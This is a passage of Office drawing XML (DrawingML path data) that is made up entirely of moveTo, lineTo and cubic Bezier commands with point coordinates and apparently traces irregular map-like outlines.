                  <a:pt x="10206" y="4696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10059" y="4876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10290" y="4865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10320" y="4804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10261" y="4701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10239" y="4686"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13926" y="4750"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13840" y="4775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13815" y="4806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13818" y="4814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13843" y="4907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13897" y="4934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13924" y="4887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13953" y="4831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13946" y="4767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13926" y="4750"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15448" y="5124"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15399" y="5166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15333" y="5185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15331" y="5230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15283" y="5243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15340" y="5286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15362" y="5282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15379" y="5227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15419" y="5223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15475" y="5203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15463" y="5139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15448" y="5124"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11803" y="5142"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11689" y="5164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11642" y="5206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11655" y="5319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11785" y="5400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11847" y="5344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12017" y="5299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11995" y="5176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11803" y="5142"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12275" y="5158"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12145" y="5161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12054" y="5168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12071" y="5220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12184" y="5249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12261" y="5235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12275" y="5158"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16001" y="5235"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15968" y="5275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15968" y="5356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16027" y="5344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16074" y="5321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16065" y="5265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16001" y="5235"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11982" y="5479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11926" y="5511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11904" y="5585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11916" y="5590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12027" y="5580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12103" y="5557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12078" y="5518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11982" y="5479"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2156" y="5700"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2114" y="5722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2074" y="5873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057" y="5890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2047" y="6038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2079" y="6019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2070" y="5974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2089" y="5959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2106" y="5871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2111" y="5792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2156" y="5700"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2045" y="6689"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2003" y="6760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1993" y="6827"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2047" y="6893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2055" y="6881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2074" y="6851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2128" y="6876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2086" y="6812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2081" y="6733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2054" y="6743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2052" y="6737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2045" y="6689"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3671" y="7001"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3732" y="7065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3828" y="7033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3895" y="7087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4005" y="7130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013" y="7233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4069" y="7312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4000" y="7406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3870" y="7518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3845" y="7423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3782" y="7369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3690" y="7460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3656" y="7361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3617" y="7406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3612" y="7487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3526" y="7644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3545" y="7794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3515" y="7856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3454" y="7890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3429" y="7927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3372" y="8041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3461" y="7954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3535" y="7992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3484" y="8095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3461" y="8243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3373" y="8206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3346" y="8085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3240" y="8177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3271" y="8248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3181" y="8317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3190" y="8437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3070" y="8566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3008" y="8681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2978" y="8704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2858" y="8588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2798" y="8423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2814" y="8287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2789" y="8166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2853" y="8038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2907" y="7970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2951" y="7975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2998" y="7947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3094" y="7863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3144" y="7930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160" y="7866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3143" y="7816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3200" y="7676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3239" y="7560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3333" y="7309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3419" y="7235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3501" y="7036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3671" y="7001"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13274" y="8740"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13237" y="8777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13305" y="8847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13236" y="8957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13301" y="9204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13419" y="9362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13487" y="9603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13500" y="9746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13571" y="9936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13608" y="10117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13672" y="10261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13710" y="10100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13833" y="10181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13800" y="10054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13630" y="9904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13621" y="9623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13806" y="9630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13591" y="9351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13488" y="9184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13433" y="9009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13340" y="8849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13274" y="8740"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20868" y="8859"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20853" y="8871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20839" y="8903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20843" y="8926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20846" y="8933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20854" y="8928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20871" y="8935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20873" y="8884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20868" y="8859"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20942" y="8859"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20930" y="8863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20922" y="8873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20905" y="8898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20901" y="8906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20906" y="8925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20920" y="8942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20928" y="8984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20933" y="9004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20959" y="9031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20975" y="9071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20989" y="9058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20982" y="9019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20977" y="8958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20970" y="8883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20967" y="8873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20942" y="8859"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20824" y="8900"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20811" y="8955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20817" y="8979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20831" y="8916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20824" y="8900"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="224" y="8915"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="203" y="9031"/>
                  <a:pt x="182" y="9147"/>
                  <a:pt x="165" y="9265"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="182" y="9147"/>
                  <a:pt x="203" y="9031"/>
                  <a:pt x="224" y="8915"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20767" y="8984"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20760" y="8985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20762" y="9036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20767" y="9036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20785" y="9049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20795" y="9012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20797" y="9004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20795" y="8990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20767" y="8984"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20689" y="9083"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20683" y="9108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20684" y="9140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20688" y="9155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20710" y="9139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20706" y="9112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20689" y="9083"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="126" y="9570"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="9743"/>
                  <a:pt x="91" y="9920"/>
                  <a:pt x="79" y="10096"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="91" y="9920"/>
                  <a:pt x="106" y="9744"/>
                  <a:pt x="126" y="9570"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="66" y="10317"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="57" y="10499"/>
                  <a:pt x="55" y="10683"/>
                  <a:pt x="56" y="10867"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="55" y="10845"/>
                  <a:pt x="54" y="10823"/>
                  <a:pt x="54" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="10638"/>
                  <a:pt x="58" y="10477"/>
                  <a:pt x="66" y="10317"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13678" y="10340"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13680" y="10492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13710" y="10753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13576" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13545" y="10957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13606" y="11133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13752" y="11091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13773" y="10872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14008" y="10938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14069" y="10724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14239" y="10615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14148" y="10425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14086" y="10529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13988" y="10517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13875" y="10487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13678" y="10340"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13801" y="11118"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13668" y="11189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13638" y="11318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13709" y="11515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13670" y="11759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13604" y="11850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13431" y="12079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13320" y="12014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13224" y="12369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13061" y="12362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12771" y="12466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12677" y="12608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12535" y="12724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12466" y="12850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12325" y="12924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12401" y="13040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12505" y="13081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12482" y="13249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12566" y="13310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12660" y="13221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12729" y="12897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12559" y="12785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12737" y="12756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12906" y="12642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13162" y="12554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13189" y="12689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13300" y="12739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13478" y="12488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13736" y="12418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13904" y="12286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13951" y="12140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13907" y="12056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13929" y="11898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13884" y="11712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13968" y="11495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13936" y="11347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13801" y="11118"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="66" y="11271"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="69" y="11347"/>
                  <a:pt x="74" y="11424"/>
                  <a:pt x="79" y="11500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="74" y="11424"/>
                  <a:pt x="69" y="11348"/>
                  <a:pt x="66" y="11271"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12992" y="12630"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12939" y="12716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12850" y="12709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12780" y="12832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12788" y="12918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12896" y="12953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12923" y="12840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12995" y="12785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13066" y="12832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13135" y="12707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13108" y="12648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12992" y="12630"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11108" y="14446"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10972" y="14581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10872" y="14754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10893" y="14882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10983" y="15027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11058" y="14885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11159" y="14604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11185" y="14498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11108" y="14446"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9135" y="15242"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8942" y="15266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8851" y="15330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8846" y="15475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8985" y="15545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9142" y="15485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9189" y="15392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9270" y="15328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9235" y="15259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9135" y="15242"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4057" y="15264"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3962" y="15463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3964" y="15685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4023" y="15838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4151" y="15878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4217" y="15872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4254" y="15735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4200" y="15544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4144" y="15402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4057" y="15264"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10982" y="15614"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10923" y="15766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10906" y="16023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10832" y="15969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10839" y="16126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10866" y="16197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10957" y="16289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10980" y="16230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11034" y="16267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10977" y="16309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10968" y="16375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11059" y="16409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11224" y="16382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11342" y="16474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11389" y="16414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11456" y="16495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11601" y="16567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11618" y="16493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11557" y="16458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11574" y="16370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11345" y="16291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11265" y="16313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11169" y="16298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11127" y="16170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11153" y="16038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11260" y="15981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11305" y="15843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11243" y="15725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11271" y="15656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11254" y="15614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11199" y="15660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11090" y="15614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10982" y="15614"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10913" y="16437"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11007" y="16559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11086" y="16636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11133" y="16498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11069" y="16442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10913" y="16437"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19834" y="16518"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19812" y="16547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19745" y="16644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19715" y="16685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19657" y="16762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19652" y="16787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19721" y="16695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19790" y="16599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19801" y="16584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19834" y="16518"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11812" y="16555"/>
